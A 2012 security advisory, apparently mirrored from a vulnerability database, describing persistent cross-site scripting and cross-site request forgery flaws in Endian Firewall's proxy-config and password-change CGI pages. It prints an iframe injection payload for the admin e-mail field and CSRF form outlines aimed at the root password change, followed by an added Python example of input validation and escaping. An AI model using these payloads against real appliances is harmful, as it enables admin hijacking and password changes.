Release date: 2012-03-01
Updated: 2012-03-05
Affected systems:
endian Endian Firewall Community 2.x
endian UTM Software Appliance 2.x
Description:
--------------------------------------------------------------------------------
BUGTRAQ ID: 52263
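Endian Firewall is an open-source GNU/Linux distribution that provides routing/firewall and unified threat management.
Endian UTM Software Appliance and Endian Firewall Community contain multiple vulnerabilities: input passed via the "PROXY_PORT", "VISIBLE_HOSTNAME" and "ADMIN_MAIL_ADDRESS" parameters to cgi-bin/proxyconfig.cgi is not properly filtered, which allows HTML and script code to be executed in the browser of a user of the affected site.
<*Source: Benjamin Kunz Mejri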
*>
Test method:
--------------------------------------------------------------------------------
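Warning
The following program (method) may be offensive in nature and is provided for security research and teaching purposes only. Use at your own risk!
Benjamin Kunz Mejri provided the following test method: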
Proof of Concept:
=================
The vulnerabilities can be exploited by remote attackers with high required user interaction or local low privileged user accounts.
For demonstration or reproduce ...
1.1
Example Code Review: Input Validation Vulnerabilities (Persistent Inject)
Server: demo.endian.com/
Path: /cgi-bin/
File: proxyconfig.cgi
<div> <div></div>
<div>
<script type="text/javascript">
$(document).ready(function() {
/* Enable visualization of service notifications */
display_notifications(["squid","dansguardian","havp","sarg"], {"startMessage": "Proxy settings are being
applied. Please hold...","updateContent": ".service-switch-form","type": "observe","endMessage": "Proxy settings have been
applied successfully.","interval": "500"});
})
</script>
<div>
<div>
<table cellpadding="0" cellspacing="0">
<tr>
<td valign="middle"><img src="https://www.linuxidc.com/images/bubble_red_sign.png" alt="" /></td>
<td valign="middle">">"<iframe src=https://vulnerability-lab.com width=600 height=600>@aollamer.de"
at "Email used for notification (cache admin)" is not valid!(or?@rem0ve)<br /></td>
</tr>
</table>
</div>
Reference(s):
https://www.example.com/cgi-bin/proxyconfig.cgi
https://www.example.com/cgi-bin/hosts.cgi
https://www.example.com/cgi-bin/dhcp.cgi
1.2
Example Code Review: Cross Site Request Forgery Vulnerabilities (Non-Persistent)
Server: demo.endian.com/
Path: /cgi-bin/
File: hotspot-changepw.cgi or changepw.cgi
<form action="/cgi-bin/changepw.cgi" method="post">
<div>
<input type='hidden' value='save' />
<div><h2>SSH Password (root)</h2></div>
<div>
<span>
<label for="username">Password *</label>
<input type="password" SIZE="5" /></span>
... or
<form enctype='multipart/form-data' method='post' action='/cgi-bin/hotspot-changepw.cgi'>
<input type='hidden' value='save' />
<table>
<tr>
<td>Password:</td>
<td><input type='password' /></td>
<td>Again:</td>
<td><input type='password' /></td>
<td><input type='submit' value='Save' /></td>
</tr>
</table>
</form>
References:
https://www.example.com/cgi-bin/changepw.cgi
https://www.example.com/cgi-bin/hotspot-changepw.cgi
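An added example, not Endian's code and not part of the original advisory: one way a CGI handler could validate the three parameters named in the description and HTML-escape a rejected value before echoing it in an error message of the form shown in 1.1. The function names, the validation rules and the first two field labels are assumptions; the sample submission is constructed from the string quoted in 1.1.

```python
import html
import re

# Assumed validation rules (not taken from Endian's code).
HOSTNAME_RE = re.compile(
    r"(?=.{1,253}\Z)[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?"
    r"(?:\.[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?)*\Z")
LOCAL_RE = re.compile(r"[A-Za-z0-9._%+-]{1,64}\Z")  # conservative local part

def valid_port(value):
    return (value.isascii() and value.isdigit() and len(value) <= 5
            and 1 <= int(value) <= 65535)

def valid_hostname(value):
    return HOSTNAME_RE.match(value) is not None

def valid_email(value):
    local, sep, domain = value.rpartition("@")
    return bool(sep) and LOCAL_RE.match(local) is not None and valid_hostname(domain)

# Parameter names are from the advisory; the first two labels are assumed.
FIELDS = {
    "PROXY_PORT": ("Proxy port", valid_port),
    "VISIBLE_HOSTNAME": ("Visible hostname", valid_hostname),
    "ADMIN_MAIL_ADDRESS": ("Email used for notification (cache admin)", valid_email),
}

def check_form(params):
    """Return (clean, errors); every error is an HTML fragment safe to emit."""
    clean, errors = {}, []
    for name, (label, is_valid) in FIELDS.items():
        raw = params.get(name, "")
        if is_valid(raw):
            clean[name] = raw  # only validated values are stored
        else:
            # The rejected value is attacker-controlled: escape it before
            # it is written into the error message.
            errors.append('"%s" at "%s" is not valid!<br />'
                          % (html.escape(raw, quote=True), html.escape(label)))
    return clean, errors

# Constructed submission; the e-mail value is the string quoted in 1.1.
SAMPLE = {
    "PROXY_PORT": "8080",
    "VISIBLE_HOSTNAME": "fw.example.com",
    "ADMIN_MAIL_ADDRESS": '">"<iframe src=https://vulnerability-lab.com width=600 height=600>@aollamer.de',
}

if __name__ == "__main__":
    print(check_form(SAMPLE))
```

Validation alone is not enough here, because the value that fails validation is exactly the one echoed back, so the escaping step is what keeps the markup from reaching the browser.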
Recommendation:
--------------------------------------------------------------------------------
Vendor patch:
endian
------
The vendor has not yet released a patch or upgrade. We recommend that users of this software watch the vendor's home page for the latest version: